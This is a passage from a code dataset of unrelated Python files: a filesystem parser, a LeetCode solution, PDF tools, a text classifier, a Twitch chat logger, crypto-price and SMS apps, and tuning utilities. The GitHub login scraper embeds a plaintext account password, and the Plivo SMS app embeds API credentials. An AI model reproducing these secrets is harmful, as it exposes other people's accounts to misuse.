io.BytesIO(self.inode.i_block)\n\n runs = []\n run_offset = 0\n\n for extent in _parse_extents(self, buf):\n # Account for uninitialized extents\n if extent.ee_len > 0x8000:\n uninitialized_gap = extent.ee_len - 0x8000\n runs.append((None, uninitialized_gap))\n run_offset += uninitialized_gap\n continue\n\n # Account for sparse gaps\n if extent.ee_block != run_offset:\n sparse_gap = extent.ee_block - run_offset\n runs.append((None, sparse_gap))\n run_offset += sparse_gap\n\n runs.append(((extent.ee_start_hi << 32) | extent.ee_start_lo, extent.ee_len))\n run_offset += extent.ee_len\n\n if run_offset < expected_runs:\n runs.append((None, expected_runs - run_offset))\n\n self._runlist = runs\n else:\n i_blocks = c_ext.uint32[15](self.inode.i_block)\n num_blocks = (self.size + self.extfs.block_size - 1) // self.extfs.block_size\n num_direct_blocks = min(num_blocks, c_ext.EXT2_NDIR_BLOCKS)\n\n blocks = i_blocks[:num_direct_blocks]\n num_blocks -= num_direct_blocks\n\n if num_blocks > 0:\n for level in range(c_ext.EXT2_NIND_BLOCKS):\n indirect_offset = i_blocks[num_direct_blocks + level]\n parsed_blocks = _parse_indirect(self, indirect_offset, num_blocks, level + 1)\n num_blocks -= len(parsed_blocks)\n blocks.extend(parsed_blocks)\n\n if num_blocks == 0:\n break\n\n runs = []\n if blocks:\n run_offset = None\n run_size = 1\n\n for block in blocks:\n if run_offset is None:\n run_offset = block\n continue\n\n if block == run_offset + run_size:\n run_size += 1\n else:\n if run_offset == 0:\n runs.append((None, run_size))\n else:\n runs.append((run_offset, run_size))\n run_offset = block\n run_size = 1\n\n runs.append((run_offset, run_size))\n\n self._runlist = runs\n\n return self._runlist\n\n def open(self) -> BinaryIO:\n if self.inode.i_flags & c_ext.EXT4_INLINE_DATA_FL or self.filetype == stat.S_IFLNK and self.size < 60:\n buf = io.BytesIO(memoryview(self.inode.i_block)[: self.size])\n # Need to add a size attribute to maintain compatibility with dissect streams\n buf.size = self.size\n return buf\n return RunlistStream(self.extfs.fh, self.dataruns(), self.size, self.extfs.block_size)\n\n\nclass XAttr:\n def __init__(self, extfs: ExtFS, inode: INode, entry: Instance, value: bytes):\n self.extfs = extfs\n self.inode = inode\n self.entry = entry\n\n self.prefix = XATTR_PREFIX_MAP.get(entry.e_name_index, \"unknown_prefix\")\n self._name = XATTR_NAME_MAP.get(entry.e_name_index, entry.e_name.decode(errors=\"surrogateescape\"))\n self.name = self.prefix + self._name\n self.value = value\n\n def __repr__(self) -> str:\n return f\"\"\n\n\ndef _parse_indirect(inode: INode, offset: int, num_blocks: int, level: int) -> list[int]:\n offsets_per_block = inode.extfs.block_size // 4\n\n if level == 1:\n read_blocks = min(num_blocks, offsets_per_block)\n inode.extfs.fh.seek(offset * inode.extfs.block_size)\n return c_ext.uint32[read_blocks](inode.extfs.fh)\n else:\n blocks = []\n\n max_level_blocks = offsets_per_block**level\n blocks_per_nest = max_level_blocks // offsets_per_block\n read_blocks = (num_blocks + blocks_per_nest - 1) // blocks_per_nest\n read_blocks = min(read_blocks, offsets_per_block)\n\n inode.extfs.fh.seek(offset * inode.extfs.block_size)\n for addr in c_ext.uint32[read_blocks](inode.extfs.fh):\n parsed_blocks = _parse_indirect(inode, addr, num_blocks, level - 1)\n num_blocks -= len(parsed_blocks)\n blocks.extend(parsed_blocks)\n\n return blocks\n\n\ndef _parse_extents(inode: INode, buf: bytes) -> Iterator[Instance]:\n extent_header = c_ext.ext4_extent_header(buf)\n\n if 
extent_header.eh_magic != 0xF30A:\n        raise Error(\"Invalid extent_header magic\")\n\n    if extent_header.eh_depth == 0:\n        for _ in range(extent_header.eh_entries):\n            extent = c_ext.ext4_extent(buf)\n            yield extent\n    else:\n        for _ in range(extent_header.eh_entries):\n            idx = c_ext.ext4_extent_idx(buf)\n            child = (idx.ei_leaf_hi << 32) | idx.ei_leaf_lo\n\n            fh = inode.extfs.fh\n            fh.seek(child * inode.extfs.block_size)\n            blockbuf = io.BytesIO(fh.read(inode.extfs.block_size))\n            yield from _parse_extents(inode, blockbuf)\n\n\ndef _iter_xattr(inode: INode, buf: BinaryIO, end: int, value_offset: int = 0) -> Iterator[XAttr]:\n    offset = buf.tell()\n    while True:\n        try:\n            if offset > end:\n                break\n\n            buf.seek(offset)\n            entry = c_ext.ext4_xattr_entry(buf)\n\n            if (entry.e_name_len, entry.e_name_index, entry.e_value_offs) == (0, 0, 0):\n                break\n\n            if entry.e_value_inum:\n                value = inode.extfs.get_inode(entry.e_value_inum).open().read(entry.e_value_size)\n            else:\n                buf.seek(value_offset + entry.e_value_offs)\n                value = buf.read(entry.e_value_size)\n\n            yield XAttr(inode.extfs, inode, entry, value)\n\n            offset += (len(entry) + c_ext.EXT4_XATTR_ROUND) & (~c_ext.EXT4_XATTR_ROUND & 0xFFFFFFFF)\n        except EOFError:\n            break\n\n\ndef _parse_ns_ts(time: int, time_extra: int) -> int:\n    # The low 2 bits of time_extra are used to extend the time field\n    # The remaining 30 bits are nanoseconds\n    time |= (time_extra & 0b11) << 32\n    ns = time_extra >> 2\n\n    return (time * 1000000000) + ns\n","repo_name":"fox-it/dissect.extfs","sub_path":"dissect/extfs/extfs.py","file_name":"extfs.py","file_ext":"py","file_size_in_byte":19098,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"26464759193","text":"class Solution:\n    def myAtoi(self, s: str) -> int:\n        # 52ms 42%\n        idx = 0\n        while idx < len(s) and s[idx] == ' ':\n            idx += 1\n        plus = 0\n        minus = 0\n        while idx < len(s) and (s[idx] == '+' or s[idx] == '-'):\n            if s[idx] == '+':\n                plus += 1\n            if s[idx] == '-':\n                minus += 1\n            idx += 1\n        if (plus and minus) or (2 <= plus) or (2 <= minus):\n            return 0\n        ans = 0\n        while idx < len(s) and '0' <= s[idx] <= '9':\n            # ans is built as a non-negative magnitude here, so the clamp must\n            # respect the sign; anything >= 214748365 overflows 32 bits after *10.\n            # (The original negative-value guard here was dead code, and a large\n            # negative input wrongly returned 2147483647.)\n            if 214748365 <= ans:\n                return -2147483648 if minus else 2147483647\n            ans *= 10\n            ans += int(s[idx])\n            idx += 1\n        if minus:\n            ans *= -1\n        if ans < -2 ** 31:\n            return -2147483648\n        if 2 ** 31 - 1 < ans:\n            return 2147483647\n        return ans\n    \nprint(Solution().myAtoi(\"42\"))\n","repo_name":"kdm111/public_self_study_note","sub_path":"LeetCode_Algorithm/8/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"3200329238","text":"from pandas import DataFrame\nfrom scapy.layers.inet import UDP\n\nfrom mice_base.fe_types import Pkt, FlowID, Flows\n\nfrom typing import List, Set\n\nSIP = 0\nDIP = 1\nSPORT = 2\nDPORT = 3\nLENGTH = 4\n\n\ndef match_forward(flow, clients, proxies) -> bool:\n    return flow[SIP] in clients and flow[DIP] in proxies\n\n\ndef match_backward(flow, clients, proxies) -> bool:\n    return flow[DIP] in clients and flow[SIP] in proxies\n\n\ndef is_fwd(fid: FlowID) -> bool:\n    return fid[2] > fid[3]\n\n\ndef is_bwd(fid: FlowID) -> bool:\n    return fid[3] > fid[2]\n\n\ndef label_forward(\n    fids: List[FlowID], fwd_idxs: Set[int], clients: List[str], proxies: List[str]\n) -> DataFrame:\n    fwd_labels = [idx in fwd_idxs for idx in range(len(fids))]\n    flow_labels = [match_forward(fid, clients, proxies) for fid in fids]
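\n    # one boolean per flow: True when the flow runs client -> proxy (the forward direction)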
\n    return DataFrame(\n        zip(fwd_labels, flow_labels, fids),\n        columns=[\"right_direction\", \"label\", \"flowid\"],\n    )\n\n\ndef label_backward(\n    fids: List[FlowID], bwd_idxs: Set[int], clients: List[str], proxies: List[str]\n) -> DataFrame:\n    bwd_labels = [idx in bwd_idxs for idx in range(len(fids))]\n    flow_labels = [match_backward(fid, clients, proxies) for fid in fids]\n\n    return DataFrame(\n        zip(bwd_labels, flow_labels, fids),\n        columns=[\"right_direction\", \"label\", \"flowid\"],\n    )\n\n\ndef label_both(flows: Flows, clients: List[str], proxies: List[str]) -> DataFrame:\n    fids = [fid for fid, _ in flows]\n    direction_labels = [True for fid in fids]\n    flow_labels = [\n        match_backward(fid, clients, proxies) or match_forward(fid, clients, proxies)\n        for fid in fids\n    ]\n\n    return DataFrame(\n        zip(direction_labels, flow_labels, fids),\n        columns=[\"right_direction\", \"label\", \"flowid\"],\n    )\n\n\ndef label_snowflake(flows: Flows, clients: List[str], background: List[str]):\n    fids = [fid for fid, _ in flows]\n    direction_labels = [True] * len(flows)\n    flow_labels = [\n        bool(\n            flow[0].haslayer(UDP)\n            and (fid.sip in clients or fid.dip in clients)\n            and (fid.sip not in background and fid.dip not in background)\n        )\n        for fid, flow in flows\n    ]\n\n    return DataFrame(\n        zip(direction_labels, flow_labels, fids),\n        columns=[\"right_direction\", \"label\", \"flowid\"],\n    )\n","repo_name":"tst-paperdice/mice_feature_extraction","sub_path":"labeling.py","file_name":"labeling.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"38715963504","text":"#!/usr/bin/env python\n# coding=utf-8\n\nfrom PyPDF2 import PdfFileReader, PdfFileWriter, PdfFileMerger\nfrom PyQt5.QtCore import QFileInfo\nfrom PyQt5.QtWidgets import QMainWindow,QFileDialog\n\nclass MyPdf(QMainWindow):\n    def __init__(self):\n        super(MyPdf, self).__init__()\n        print('Created a PDF object')\n\n    def getfile(self):\n        self.fileName, self.filetype = QFileDialog.getOpenFileName(self, \"Select File\", \"/\", \"PDF Files (*.pdf)\")\n        fileinfo = QFileInfo(self.fileName)\n        self.file_path = fileinfo.absolutePath()\n        if self.file_path != '':\n            self.getNumPages()\n\n    def getNumPages(self):\n        fp_read_file = open(self.fileName, 'rb')\n        self.pdf_input = PdfFileReader(fp_read_file) # parse the PDF that is to be split\n        self.page_count = self.pdf_input.getNumPages() # get the number of pages in the PDF\n        # print(\"This file has {} pages\".format(page_count)) # print the page count\n\n    def splitpdf(self, split_lists):\n        for split_list in split_lists:\n            pdf_output = PdfFileWriter() # instantiate a PDF file writer\n            for i in range(split_list[0]-1, split_list[1]):\n                pdf_output.addPage(self.pdf_input.getPage(i))\n            with open(split_list[2], 'wb') as sub_fp:\n                pdf_output.write(sub_fp)\n        print('Finished splitting the file')\n\n    def merge(self, file_lists, new_filename):\n        merger = PdfFileMerger()\n        for file in file_lists: # merge the selected PDF files\n            merger.append(open(file, 'rb'))\n        with open(new_filename, 'wb') as fout: # the output file is newfile.pdf\n            merger.write(fout)\n        print('Finished merging the files')\n\n","repo_name":"Jianhua-Xie/PDF_tools","sub_path":"MyPdfTools.py","file_name":"MyPdfTools.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"20909419610","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# LTAT.01.002 Language Technology (spring 2019)\n# Homework 2: Text classification
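\n\n# Approaches compared below: scikit-learn bag-of-words + multinomial naive Bayes\n# (optionally with lemmas and/or stop words) and a gensim doc2vec model.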
\n\nimport random\nimport os\nimport nltk\nfrom sklearn.naive_bayes import MultinomialNB\nimport estnltk\nfrom nltk.probability import *\nfrom estnltk import Text\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nimport pandas as pd\nfrom sklearn.model_selection import KFold\n\n# Gensim\nimport gensim\nimport gensim.corpora as corpora\nfrom gensim.utils import simple_preprocess\nfrom gensim.models import CoherenceModel\n\n# Enable logging for gensim - optional\nimport logging\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.ERROR)\n\nlabels = [\"www.advent.ee\", \"www.bioneer.ee\", \"www.lapsemure.ee\", \"www.naisteleht.ee\", \"arvamus.postimees.ee\"]\n\n# Read in the corpus (the corpus lives in a subfolder of the program directory)\ndef loaddata(corpus):\n\tcolumns = ['label', 'text']\n\tdata = pd.DataFrame(columns = columns)\n\tfor f in os.listdir(os.getcwd() + \"/\" + corpus):\n\t\tdf = pd.read_csv(os.getcwd() + \"/\" + corpus + \"/\" + f, delimiter=\"\\t\", index_col=None, header=None, names=columns)\n\t\tdata = data.append(df)\n\treturn data\n\ndef bagOfWordsprinter(tegevus):\n\t# Helper method for nicer output\n\tprint(\"###########################\")\n\tprint(\"BagOfWords\")\n\tif tegevus == 0:\n\t\tprint(\"(without extra parameters)\\n\")\n\tif tegevus == 1:\n\t\tprint(\"(+ lemmas)\\n\")\n\tif tegevus == 2:\n\t\tprint(\"(+ stop words)\\n\")\n\tif tegevus == 3:\n\t\tprint(\"(+ lemmas + stop words)\\n\")\n\ndef doc2VecPrinter():\n\t# Helper method for nicer output\n\tprint(\"###########################\")\n\tprint(\"Doc2Vec \\n\")\n\ndef stopWords(limit, tegevus):\n\t# If we want to use stop words (option 2 or 3)\n\tif tegevus == 2 or tegevus == 3:\n\t\tcolumns = ['arv','sona','NaN']\n\t\tdata = pd.DataFrame(columns = columns)\n\t\tdf = pd.read_csv(os.getcwd() + \"/\" + \"sagedussonastik_lemmad_kahanev.txt\", delimiter=\" \", index_col=None, header=None, names=columns)\n\t\tdata = data.append(df)\n\t\tarv = 0\n\t\tsonad = []\n\t\tfor i, rida in data.iterrows():\n\t\t\tkat = rida['arv']\n\t\t\tsisu = rida['sona']\n\t\t\tif arv < limit:\n\t\t\t\tsonad.append(sisu)\n\t\t\t\tarv += 1\n\t\t#print(sonad)\n\telse:\n\t\tsonad = []\n\treturn sonad\n\n# Training\ndef bagOfWords(tekstid, stopWordsLimit, tegevus):\n\tglobal globalLemmad\n\tif tegevus == 1 or tegevus == 3:\n\t\tglobalLemmad = True\n\telse:\n\t\tglobalLemmad = False\n\tbagOfWordsprinter(tegevus)\n\tallcounts = {}\n\tcount_vects = {}\n\t# Stop word list\n\tstopwords = stopWords(stopWordsLimit, tegevus)\n\t# Results dictionary\n\tresults = {'all': []}\n\tfor i, row in tekstid.iterrows():\n\t\ttext = row[\"text\"]\n\t\tlabel = row[\"label\"]\n\t\t# If we want to lemmatize (option 1 or 3)\n\t\tif tegevus == 1 or tegevus == 3:\n\t\t\t#print(\"Check 1\")\n\t\t\ttext = \" \".join(Text(text).lemmas)\n\t\tresults['all'].append(text)\n\t\tif label in results:\n\t\t\tresults[label].append(text)\n\t\telse:\n\t\t\tresults[label] = [text]\n\n\t# Go over all results and turn them into vectors in a new dictionary\n\tfor i in results.keys():\n\t\tcount_vect = CountVectorizer(stop_words=stopwords)\n\t\tcount_vects[i] = count_vect\n\t\tallcounts[i] = count_vect.fit_transform(results[i])\n\n\t# Weight each word by its occurrence ratio (tf-idf)\n\ttfidf_transformer = TfidfTransformer()\n\tcount_tfidf = tfidf_transformer.fit_transform(allcounts['all'])\n\t# Train the model\n\tmodel = MultinomialNB().fit(count_tfidf, tekstid[\"label\"])\n\treturn [model, count_vects['all'], tfidf_transformer]\n
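\n\n# Rough shape of the training data handed to gensim in doc2Vec below (values illustrative):\n#   TaggedDocument(words=['tere', 'maailm'], tags=['www.advent.ee'])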
tekstid[\"label\"])\n\treturn [model, count_vects['all'], tfidf_transformer]\n\n\ndef doc2Vec(tekstid):\n\tdoc2VecPrinter()\n\t#Loome gensin jaoks listi\n\tdocuments = []\n\tfor i, rida in tekstid.iterrows():\n\t\t#Loeme sisse tekstid mudeli\n\t\tdocuments.append(gensim.models.doc2vec.TaggedDocument(Text(rida['text']).word_texts, [rida['label']]))\n\t#Treenime doc2vec mudelit (parameetrid votsin nii nagu tunni materjalides olid)\n\tmodel = gensim.models.doc2vec.Doc2Vec(documents, vector_size=100, window=8, min_count=5, workers=4)\n\treturn model\n\n#def kfold(tekstid):\n\t#kfold = KFold(n_splits=2, random_state=None, shuffle=False)\n\t#for a, b in kfold.split(tekstid):\n\n# Ennustamine\ndef predict(mudel, sample):\n\t#Siin on erinevate mudelite ennustamised\n\t# predictDoc2Vec(model, text)\n\t# predictBagOfWords(model, sample)\n\treturn predictBagOfWords(mudel, sample)\n\ndef predictBagOfWords(mudel, sample):\n\t#Praktikumi BagOfWords saadud ennustamine\n\tcount_vect = mudel[1]\n\ttfidf_transformer = mudel[2]\n\tmodels = mudel[0]\n\tglobal globalLemmad\n\tif globalLemmad:\n\t\tsample = \" \".join(Text(sample).lemmas)\n\t#Õpetame mudelit test hulgaga\n\tX_test_counts = count_vect.transform([sample])\n\tX_test_tfidf = tfidf_transformer.transform(X_test_counts)\n\t# Ennustame mudeli põhjal\n\tennustused = models.predict(X_test_tfidf)\n\treturn ennustused[0]\n\ndef predictDoc2Vec(mudel, text):\n\t#Praktikumi gensim materjalist saadud ennustamine\n\tinferred_docvec = mudel.infer_vector(Text(text).word_texts)\n\t#[0][0] mõtte sain kursusekaaslaselt\n\treturn mudel.docvecs.most_similar([inferred_docvec], topn=2)[0][0]\n\n#Learn\ndef learn(corpus):\n\t# doc2Vec(corpus)\n\t# bagOfWords(corpus, stopWordsLimit, tegevus) tegevus:\n\t# N: bagOfWords(corpus, 20, 3)\n\t# 0 (ära kasuta midagi),\n\t# 1 (kasuta lemmasid),\n\t# 2 (kasuta stopp sõnu),\n\t# 3 (kasuta mõlemat)\n\treturn bagOfWords(corpus, 50, 0)\n\n\n# Hindamine (testhulgal)\n# Sisend: treenimisfunktsiooni väljundist saadud mudel ja testkorpuses olev info DataFrame'ina\ndef evaluate(model, testset):\n\tcorrect = 0\n\tfor i, row in testset.iterrows():\n\t\trightAnswer = row['label']\n\t\ttext = row['text']\n\t\tprediction = predict(model, text)\n\t\t#print(rightAnswer, prediction)\n\t\tif rightAnswer == prediction:\n\t\t\tcorrect += 1\n\t\n\tprint(\"Täpsus: {0:}%\".format(100.0 * correct/len(testset)))\n\n\ndef evaluateDoc2Vec(model, testset):\n\tcorrect = 0\n\tfor i, row in testset.iterrows():\n\t\trightAnswer = row['label']\n\t\ttext = row['text']\n\t\tprediction = predictDoc2Vec(model, text)\n\t\t# print(rightAnswer, prediction)\n\t\tif rightAnswer == prediction:\n\t\t\tcorrect += 1\n\n\tprint(\"Täpsus: {0:}%\".format(100.0 * correct / len(testset)))\n\ndef doEverything():\n\t#Käime kõik mudelid läbi\n\t#Sedasi ei pea mitukorda lugema sisse train ja test andmeid\n\ttrainSet = loaddata(\"a_train\")\n\ttestSet = loaddata(\"a_test\")\n\n\tbagOfWordsmodel1 = bagOfWords(trainSet, 50, 0)\n\tevaluate(bagOfWordsmodel1, testSet)\n\n\tbagOfWordsmodel2 = bagOfWords(trainSet, 50, 1)\n\tevaluate(bagOfWordsmodel2, testSet)\n\n\tbagOfWordsmodel3 = bagOfWords(trainSet, 50, 2)\n\tevaluate(bagOfWordsmodel3, testSet)\n\n\tbagOfWordsmodel4 = bagOfWords(trainSet, 50, 3)\n\tevaluate(bagOfWordsmodel4, testSet)\n\n\tdoc2Vecmodel = doc2Vec(trainSet)\n\tevaluateDoc2Vec(doc2Vecmodel, testSet)\n\n#Globaalne muutuja, mis aitab lemmade puhul paremini ennustada meeotdis predictBagOfWords()\nglobalLemmad = False\n\ndoEverything()\n#BagOfWords => 58.3%\n#BagOfWords + lemmad 
\n#BagOfWords + stop words => 63%\n#BagOfWords + stop words + lemmas => 64.3%\n#Word2Vec => 91%\n\n#trainSet = loaddata(\"a_train\")\n#model = learn(trainSet)\n#testSet = loaddata(\"a_test\")\n#evaluate(model, testSet)\n","repo_name":"Vossip/language-technology","sub_path":"kodune2/kt_kodutoo_2.py","file_name":"kt_kodutoo_2.py","file_ext":"py","file_size_in_byte":6950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"19338220282","text":"import socket\nimport threading\nimport re as regex\nfrom lib.util import getTimeStamp,postWebhook\n\nclass TwitchLogger:\n\tdef __init__(self, channelName:str, WH_TWITCH_URL:str) -> None:\n\t\tself.WH_URL = WH_TWITCH_URL\n\t\tserver = 'irc.chat.twitch.tv'\n\t\tport = 6667\n\t\tnickname = 'justinfan12345'\n\t\tself.irc_socket = socket.socket()\n\t\tself.irc_socket.connect((server, port))\n\t\tself.irc_socket.send(f'PASS {nickname}\\r\\n'.encode('utf-8'))\n\t\tself.irc_socket.send(f'NICK {nickname}\\r\\n'.encode('utf-8'))\n\t\tself.irc_socket.send(f'JOIN #{channelName}\\r\\n'.encode('utf-8'))\n\t\ttwitch_thread = threading.Thread(target=self.listen,daemon=True)\n\t\ttwitch_thread.start()\n\n\tdef listen(self):\n\t\twhile True:\n\t\t\tmessage = self.irc_socket.recv(2048).decode('utf-8')\n\t\t\tping_data = regex.search(r\"PING :tmi\\.twitch\\.tv\", message)\n\t\t\tif ping_data:\n\t\t\t\tself.irc_socket.send(bytes(f\"PONG {ping_data.group(0).split(':')[1]}\\r\\n\", \"UTF-8\"))\n\t\t\t\tcontinue\n\t\t\tif message.startswith(\":tmi.twitch.tv\") or message.startswith(\":justinfan12345\") or message.startswith(\"PING\"):\n\t\t\t\tcontinue\n\t\t\tif \"#owmince\" in message:\n\t\t\t\tusername = message.split(\"!\")[0][1:].strip()\n\t\t\t\ttext = message.split(\"#owmince :\")[1]\n\t\t\t\tdiscordRelativeTimestamp = f\"Logged \"\n\t\t\t\tembed = {\"description\": f\"{text}\",\"title\": f\"{username}\"}\n\t\t\t\twhdata = {\n\t\t\t\t\t\"content\": f\"{discordRelativeTimestamp}\",\n\t\t\t\t\t\"username\": \"HawkEye (Twitch Logs)\",\n\t\t\t\t\t\"embeds\": [embed],\n\t\t\t\t}\n\t\t\t\tpostWebhook(self.WH_URL,whdata)","repo_name":"PixelBot-Dev-Team/hawkeye","sub_path":"loggers/TwitchLogger.py","file_name":"TwitchLogger.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"18635239809","text":"#tasks.py\n\nimport ccxt\nimport random\nimport datetime\nfrom PriceAnalysis.models import price, Asset\n\nfrom celery import shared_task\n\n\n\n@shared_task\ndef fetch_coin_price():\n\tbinance = ccxt.binance({\"verbose\": True})\n\n\tfor asset in Asset.objects.all():\n\t\tassetprice = binance.fetch_ticker(asset.ticker)\n\t\tpricechange = assetprice.get(\"percentage\")\n\t\tprint(assetprice)\n\t\tprice.objects.create(\n\t\t\tlast_price=assetprice.get(\"last\"),\n\t\t\tpricechange=pricechange,\n\t\t\tasset = asset,\n\t\t\t)\n\n\"\"\"{'symbol': 'BNB/USDT',\n 'timestamp': 1648205620298,\n 'datetime': '2022-03-25T10:53:40.298Z',\n 'high': 416.6, 'low': 405.0, 'bid': 414.9,\n 'bidVolume': 191.724,\n 'ask': 415.0, 'askVolume': 365.5,\n 'vwap': 412.59700037, 'open': 410.3,\n 'close': 415.0, 'last': 415.0,\n 'previousClose': '410.30000000',\n 'change': 4.7, 'percentage': 1.146,\n 'average': 412.65, 'baseVolume': 555348.894,\n 'quoteVolume': 
229135287.8226,\"\"\"\n\n\n","repo_name":"welhoilija/CryptoPortfolio-Django","sub_path":"PriceAnalysis/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"71400578718","text":"import requests\nfrom lxml import html\n\n#Request headers\nheaders = {\n    \"user-agent\" : \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/71.0.3578.80 Chrome/71.0.3578.80 Safari/537.36\"\n}\n\n#Github login page\nlogin_form_url = 'https://github.com/login'\n\n#Session handling\nsession = requests.Session()\n\n#Requests are made through the session\nlogin_form_res = session.get(login_form_url, headers=headers)\n\n#Get the valid token from the html tree\nparser = html.fromstring(login_form_res.text)\ntoken_especial = parser.xpath('//input[@name=\"authenticity_token\"]/@value')\n\n#Url the POST request is sent to\nlogin_url = \"https://github.com/session\"\n\n#Parameters that allow logging in\nlogin_data = {\n    \"login\": \"JeanCarlo96\",\n    \"password\": \"pl33nkmldr7wx\",\n    \"commit\": \"Sign in\",\n    \"authenticity_token\": token_especial\n}\n\n#Send the POST request\nsession.post(\n    login_url,\n    data= login_data,\n    headers=headers\n)\n\n#Data extraction\n#Url accessed after logging in\ndata_url = 'https://github.com/JeanCarlo96?tab=repositories'\nrespuesta = session.get(\n    data_url,\n    headers=headers\n)\n\n#Get the HTML tree and parse it\nparser = html.fromstring(respuesta.text)\nrepositorios = parser.xpath('//h3[@class=\"wb-break-all\"]/a/text()')\nfor repositorio in repositorios:\n    print(repositorio)","repo_name":"JeanCarlo96/FertilizantesBots","sub_path":"WebScraping/nivel_5_github_request.py","file_name":"nivel_5_github_request.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"26462026276","text":"# -*- coding: utf-8 -*-\nfrom flask import Flask, request, make_response, Response, flash, redirect, render_template, session, abort\nimport plivo\nimport json\n\napp = Flask(__name__, static_url_path='')\n\n\n@app.route('/send_sms/', methods=['POST'])\ndef outbound_sms():\n\n\t# Form field names are assumptions; the hard-coded test numbers are kept as fallbacks\n\tfrom_number = request.form.get(\"src\", \"123456789\")\n\tto_number = request.form.get(\"dst\", \"918827932461\")\n\tcontent = request.form.get(\"text\")\n\n\tclient = plivo.RestClient('MAZWU5OWM4YTK3ZJAXMG', 'NmE5M2I4NDFkYWUxZjNjOTU0NjM4ZjNlNWZhMzQ2')\n\ttry:\n\t\tresp = client.messages.create(\n\t\t\tsrc=from_number,  # Sender's phone number with country code\n\t\t\tdst=to_number,  # Receiver's phone number with country code\n\t\t\ttext=content,\n\t\t)\n\t\treturn str(resp)\n\texcept plivo.exceptions.PlivoRestError as e:\n\t\tprint(e)\n\t\treturn str(e)\n\n@app.route('/send_message/', methods=['GET'])\ndef outbound_sms_template():\n\treturn render_template('test_sms_flask.html')\n\nif __name__ == \"__main__\":\n    app.run(debug=True)\n","repo_name":"pranav-plivo/send-sms","sub_path":"send_sms.py","file_name":"send_sms.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14393499860","text":"from __future__ import annotations\n\nimport json\nimport pprint\nfrom os import PathLike\nfrom pathlib import Path\nfrom typing import Any\n\nimport gnn_tracking\nimport optuna\nfrom
gnn_tracking.utils.versioning import get_commit_hash\n\nfrom gnn_tracking_hpo.util.log import logger\n\n\ndef auto_suggest_if_not_fixed(\n key: str,\n config: dict[str, Any],\n trial: optuna.Trial,\n *args,\n **kwargs,\n) -> Any:\n \"\"\"Similar to ``suggest_if_not_fixed``, but automatically chooses the correct\n function.\n\n **Important**: It matters whether the argument types are ints or floats!\n \"\"\"\n if key in config:\n logger.debug(\"Already fixed %s to %s\", key, config[key])\n return\n if key in trial.params:\n logger.debug(\"Already fixed %s to %s\", key, config[key])\n return\n if len(args) == 2:\n if all(isinstance(x, int) for x in args):\n return trial.suggest_int(key, *args, **kwargs)\n else:\n return trial.suggest_float(key, *args, **kwargs)\n elif len(args) == 1:\n if isinstance(args[0], list):\n if all(isinstance(x, bool) for x in args[0]):\n # Careful because bools are ints\n pass\n elif all(isinstance(x, int) for x in args[0]):\n ma = max(args[0])\n mi = min(args[0])\n if ma - mi == len(args[0]) - 1:\n logger.warning(\n \"Substituting suggest_int from %s to %s instead of \"\n \"categorical %s\",\n mi,\n ma,\n args[0],\n )\n return trial.suggest_int(key, mi, ma)\n return trial.suggest_categorical(key, *args, **kwargs)\n return trial.suggest_categorical(key, *args, **kwargs)\n else:\n config[key] = args[0]\n return args[0]\n else:\n raise ValueError(\"Do not understand specification\")\n\n\ndef read_json(path: PathLike | str) -> dict[str, Any]:\n \"\"\"Open and read a json file\"\"\"\n with Path(path).open() as f:\n config = json.load(f)\n return config\n\n\ndef get_metadata(*, test=False):\n return {\n \"test\": test,\n \"gnn_tracking_hash\": get_commit_hash(gnn_tracking),\n \"gnn_tracking_experiments_hash\": get_commit_hash(Path(__file__).parent),\n }\n\n\ndef get_points_to_evaluate(\n paths: None | list[str] | list[PathLike] = None,\n) -> list[dict[str, Any]]:\n \"\"\"Read json files or read from wandb online and return a list of dicts.\n Json files can either contain dictionary (single config) or a list thereof.\n \"\"\"\n points_to_evaluate: list[dict[str, Any]] = []\n if paths is None:\n paths = list[str]()\n for path in paths:\n if isinstance(path, str) and \"/\" not in path and not Path(path).exists():\n logger.debug(\"Assuming that %s is a wandb hash\", path)\n # Assume it's a wandb hash\n points_to_evaluate.append(retrieve_config_from_wandb(str(path)))\n continue\n obj = read_json(path)\n if isinstance(obj, list):\n points_to_evaluate.extend(obj)\n elif isinstance(obj, dict):\n points_to_evaluate.append(obj)\n else:\n raise ValueError(\"Decoding of json file failed\")\n if points_to_evaluate:\n logger.info(\"Enqueued trials:\\n%s\", pprint.pformat(points_to_evaluate))\n return points_to_evaluate\n\n\ndef retrieve_config_from_wandb(hash: str) -> dict[str, Any]:\n \"\"\"Retrieve configuration of run from wandb based on (part of) a hash\"\"\"\n import wandb\n\n logger.debug(\"Attempting to retrieve config for hash %s from wandb\", hash)\n api = wandb.Api()\n run = api.run(f\"gnn_tracking/{hash}\")\n logger.debug(\"Obtained run with URL %s from wandb\", run.url)\n ignored_keys = [\n \"pid\",\n \"test\",\n \"node_ip\",\n \"trial_id\",\n \"experiment_id\",\n \"gnn_tracking_experiments_hash\",\n \"gnn_tracking_hash\",\n \"hostname\",\n \"date\",\n \"trial_log_path\",\n ]\n return {\n k: v\n for k, v in run.config.items()\n if not k.startswith(\"_\") and k not 